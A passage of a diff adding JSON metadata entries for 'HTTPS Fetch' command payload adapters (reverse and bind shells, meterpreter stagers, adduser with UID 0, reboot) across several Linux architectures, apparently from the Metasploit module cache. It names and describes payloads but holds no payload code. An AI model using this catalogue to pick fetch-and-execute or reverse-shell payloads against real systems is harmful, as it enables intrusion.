"arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/aarch64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/aarch64/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/aarch64", + "adapted_refname": "linux/aarch64/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/https/aarch64/meterpreter_reverse_https": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/aarch64/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an AARCH64 payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/aarch64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/aarch64/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/aarch64", + "adapted_refname": "linux/aarch64/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/https/aarch64/meterpreter_reverse_tcp": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/aarch64/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam 
Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an AARCH64 payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/aarch64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/aarch64/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/aarch64", + "adapted_refname": "linux/aarch64/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/https/aarch64/shell/reverse_tcp": { + "name": "HTTPS Fetch, Linux dup2 Command Shell, Reverse TCP Stager", + "fullname": "payload/cmd/linux/https/aarch64/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre" + ], + "description": "Fetch and execute an AARCH64 payload from an HTTPS server.\ndup2 socket in x12, then execve.\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/aarch64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/aarch64/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/aarch64", + "adapted_refname": "linux/aarch64/shell/reverse_tcp", + "staged": true, + "stage_refname": "linux/aarch64/shell", + "stager_refname": "linux/aarch64/reverse_tcp" + }, + 
"payload_cmd/linux/https/aarch64/shell_reverse_tcp": { + "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/linux/https/aarch64/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre" + ], + "description": "Fetch and execute an AARCH64 payload from an HTTPS server.\nConnect back to attacker and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/aarch64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/aarch64/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/aarch64", + "adapted_refname": "linux/aarch64/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/https/armbe/meterpreter_reverse_http": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/armbe/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an ARMBE payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/armbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/armbe/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + 
"needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/armbe", + "adapted_refname": "linux/armbe/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/https/armbe/meterpreter_reverse_https": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/armbe/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an ARMBE payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/armbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/armbe/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/armbe", + "adapted_refname": "linux/armbe/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/https/armbe/meterpreter_reverse_tcp": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/armbe/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an ARMBE payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/armbe.rb", + "is_install_path": true, + "ref_name": 
"cmd/linux/https/armbe/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/armbe", + "adapted_refname": "linux/armbe/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/https/armbe/shell_bind_tcp": { + "name": "HTTPS Fetch, Linux ARM Big Endian Command Shell, Bind TCP Inline", + "fullname": "payload/cmd/linux/https/armbe/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Balazs Bucsay @xoreipeip " + ], + "description": "Fetch and execute an ARMBE payload from an HTTPS server.\nListen for a connection and spawn a command shell", + "references": [ + "URL-https://github.com/earthquake/shellcodes/blob/master/armeb_linux_ipv4_bind_tcp.s" + ], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/armbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/armbe/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/armbe", + "adapted_refname": "linux/armbe/shell_bind_tcp", + "staged": false + }, + "payload_cmd/linux/https/armle/adduser": { + "name": "HTTPS Fetch, Linux Add User", + "fullname": "payload/cmd/linux/https/armle/adduser", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Jonathan Salwan" + ], + "description": "Fetch and execute an ARMLE payload from an HTTPS server.\nCreate a new user with UID 0", + "references": [], + "platform": "Linux", + 
"arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/armle/adduser", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/armle", + "adapted_refname": "linux/armle/adduser", + "staged": false + }, + "payload_cmd/linux/https/armle/exec": { + "name": "HTTPS Fetch, Linux Execute Command", + "fullname": "payload/cmd/linux/https/armle/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Jonathan Salwan" + ], + "description": "Fetch and execute an ARMLE payload from an HTTPS server.\nExecute an arbitrary command", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/armle/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/armle", + "adapted_refname": "linux/armle/exec", + "staged": false + }, + "payload_cmd/linux/https/armle/meterpreter/bind_tcp": { + "name": "HTTPS Fetch, Bind TCP Stager", + "fullname": "payload/cmd/linux/https/armle/meterpreter/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "nemo " + ], + "description": "Fetch and execute an ARMLE payload from an HTTPS server.\nListen 
for a connection", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/armle/meterpreter/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/armle", + "adapted_refname": "linux/armle/meterpreter/bind_tcp", + "staged": true, + "stage_refname": "linux/armle/meterpreter", + "stager_refname": "linux/armle/bind_tcp" + }, + "payload_cmd/linux/https/armle/meterpreter/reverse_tcp": { + "name": "HTTPS Fetch, Reverse TCP Stager", + "fullname": "payload/cmd/linux/https/armle/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "nemo ", + "tkmru" + ], + "description": "Fetch and execute an ARMLE payload from an HTTPS server.\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/armle/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/armle", + "adapted_refname": "linux/armle/meterpreter/reverse_tcp", + "staged": true, + "stage_refname": "linux/armle/meterpreter", + "stager_refname": "linux/armle/reverse_tcp" + }, + 
"payload_cmd/linux/https/armle/meterpreter_reverse_http": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/armle/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an ARMLE payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/armle/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/armle", + "adapted_refname": "linux/armle/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/https/armle/meterpreter_reverse_https": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/armle/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an ARMLE payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/armle/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + 
"payload_type": 8, + "adapter_refname": "cmd/linux/https/armle", + "adapted_refname": "linux/armle/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/https/armle/meterpreter_reverse_tcp": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/armle/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an ARMLE payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/armle/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/armle", + "adapted_refname": "linux/armle/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/https/armle/shell/bind_tcp": { + "name": "HTTPS Fetch, Linux dup2 Command Shell, Bind TCP Stager", + "fullname": "payload/cmd/linux/https/armle/shell/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "nemo " + ], + "description": "Fetch and execute an ARMLE payload from an HTTPS server.\ndup2 socket in r12, then execve.\n\nListen for a connection", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/armle.rb", + "is_install_path": true, + "ref_name": 
"cmd/linux/https/armle/shell/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/armle", + "adapted_refname": "linux/armle/shell/bind_tcp", + "staged": true, + "stage_refname": "linux/armle/shell", + "stager_refname": "linux/armle/bind_tcp" + }, + "payload_cmd/linux/https/armle/shell/reverse_tcp": { + "name": "HTTPS Fetch, Linux dup2 Command Shell, Reverse TCP Stager", + "fullname": "payload/cmd/linux/https/armle/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "nemo ", + "tkmru" + ], + "description": "Fetch and execute an ARMLE payload from an HTTPS server.\ndup2 socket in r12, then execve.\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/armle/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/armle", + "adapted_refname": "linux/armle/shell/reverse_tcp", + "staged": true, + "stage_refname": "linux/armle/shell", + "stager_refname": "linux/armle/reverse_tcp" + }, + "payload_cmd/linux/https/armle/shell_bind_tcp": { + "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/linux/https/armle/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "civ", + "hal" + ], + "description": "Fetch and execute an ARMLE 
payload from an HTTPS server.\nConnect to target and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/armle/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/armle", + "adapted_refname": "linux/armle/shell_bind_tcp", + "staged": false + }, + "payload_cmd/linux/https/armle/shell_reverse_tcp": { + "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/linux/https/armle/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "civ" + ], + "description": "Fetch and execute an ARMLE payload from an HTTPS server.\nConnect back to attacker and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/armle/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/armle", + "adapted_refname": "linux/armle/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/https/mips64/meterpreter_reverse_http": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/mips64/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + 
"disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an MIPS64 payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/mips64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/mips64/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/mips64", + "adapted_refname": "linux/mips64/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/https/mips64/meterpreter_reverse_https": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/mips64/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an MIPS64 payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/mips64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/mips64/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/mips64", + "adapted_refname": "linux/mips64/meterpreter_reverse_https", + "staged": false + }, + 
"payload_cmd/linux/https/mips64/meterpreter_reverse_tcp": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/mips64/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an MIPS64 payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/mips64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/mips64/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/mips64", + "adapted_refname": "linux/mips64/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/https/mipsbe/exec": { + "name": "HTTPS Fetch, Linux Execute Command", + "fullname": "payload/cmd/linux/https/mipsbe/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Michael Messner ", + "entropy " + ], + "description": "Fetch and execute an MIPSBE payload from an HTTPS server.\n\n A very small shellcode for executing commands.\n This module is sometimes helpful for testing purposes.", + "references": [ + "EDB-17940" + ], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/mipsbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/mipsbe/exec", + "check": false, + "post_auth": false, + "default_credential": false, 
+ "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/mipsbe", + "adapted_refname": "linux/mipsbe/exec", + "staged": false + }, + "payload_cmd/linux/https/mipsbe/meterpreter/reverse_tcp": { + "name": "HTTPS Fetch, Reverse TCP Stager", + "fullname": "payload/cmd/linux/https/mipsbe/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "juan vazquez ", + "tkmru" + ], + "description": "Fetch and execute an MIPSBE payload from an HTTPS server.\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/mipsbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/mipsbe/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/mipsbe", + "adapted_refname": "linux/mipsbe/meterpreter/reverse_tcp", + "staged": true, + "stage_refname": "linux/mipsbe/meterpreter", + "stager_refname": "linux/mipsbe/reverse_tcp" + }, + "payload_cmd/linux/https/mipsbe/meterpreter_reverse_http": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/mipsbe/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an MIPSBE payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + 
"mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/mipsbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/mipsbe/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/mipsbe", + "adapted_refname": "linux/mipsbe/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/https/mipsbe/meterpreter_reverse_https": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/mipsbe/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an MIPSBE payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/mipsbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/mipsbe/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/mipsbe", + "adapted_refname": "linux/mipsbe/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/https/mipsbe/meterpreter_reverse_tcp": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/mipsbe/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an MIPSBE payload from an HTTPS server.", + 
"references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/mipsbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/mipsbe/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/mipsbe", + "adapted_refname": "linux/mipsbe/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/https/mipsbe/reboot": { + "name": "HTTPS Fetch, Linux Reboot", + "fullname": "payload/cmd/linux/https/mipsbe/reboot", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Michael Messner ", + "rigan - " + ], + "description": "Fetch and execute an MIPSBE payload from an HTTPS server.\n\n A very small shellcode for rebooting the system.\n This payload is sometimes helpful for testing purposes or executing\n other payloads that rely on initial startup procedures.", + "references": [ + "URL-http://www.shell-storm.org/shellcode/files/shellcode-795.php" + ], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/mipsbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/mipsbe/reboot", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/mipsbe", + "adapted_refname": "linux/mipsbe/reboot", + "staged": false + }, + "payload_cmd/linux/https/mipsbe/shell/reverse_tcp": { + "name": "HTTPS Fetch, Linux Command 
